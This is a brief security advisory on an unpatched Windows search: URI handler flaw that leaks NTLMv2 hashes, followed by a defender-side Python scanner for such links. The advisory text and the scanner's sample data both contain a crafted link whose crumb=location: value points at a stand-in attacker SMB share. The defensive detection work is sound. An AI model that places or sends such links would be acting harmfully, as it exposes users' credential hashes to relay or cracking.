Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829, the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April, and achieves the same end via search:query and crumb=location: parameters that point at an attacker-controlled UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply the mitigations Huntress recommends.
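
A defender-side check for the link pattern described above, as an added example that is not code from Huntress or Microsoft: it scans mail or web content for search: URIs whose crumb=location: value is a UNC path and reports the remote host and share. The function names and sample links are constructed for illustration, and the handling of percent-encoded backslashes is an assumption about how such links may appear in content.

```python
import re
from urllib.parse import unquote

# A search: URI, up to whitespace or a closing quote/angle bracket.
# The lookbehind avoids matching inside longer words such as "research:".
SEARCH_URI = re.compile(r"(?<![A-Za-z0-9+.\-])search:[^\s\"'<>]+", re.IGNORECASE)
# crumb=location: followed by a UNC prefix (\\host, optionally \share).
UNC_CRUMB = re.compile(
    r"crumb=location:\\\\([^\\&\s]+)(?:\\([^\\&\s]*))?", re.IGNORECASE
)

def decode(value, rounds=3):
    """Percent-decode repeatedly so %5C and %255C forms are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_unc_search_links(text):
    """Return (raw_uri, host, share) for each search: URI whose
    crumb location is a UNC path, i.e. would trigger an SMB connection."""
    hits = []
    for match in SEARCH_URI.finditer(text):
        crumb = UNC_CRUMB.search(decode(match.group(0)))
        if crumb:
            hits.append((match.group(0), crumb.group(1), crumb.group(2) or ""))
    return hits

# Constructed sample content (not real traffic): two UNC links, one local
# path, and one line of ordinary prose that must not be flagged.
SAMPLE = r'''
<a href="search:query=test&crumb=location:\\attacker\share">Open report</a>
<a href="SEARCH:query=invoice&crumb=location:%5C%5Cfiles.example.net%5Cdocs">Invoice</a>
<a href="search:query=notes&crumb=location:C:\Users\Public">Local search</a>
Our research:query tips are at https://example.org/search?q=crumb
'''

if __name__ == "__main__":
    for raw, host, share in find_unc_search_links(SAMPLE):
        print(f"UNC crumb -> host={host} share={share} uri={raw}")
```

Hosts reported here can be compared against outbound SMB (TCP 445) logs to see whether a connection was actually attempted.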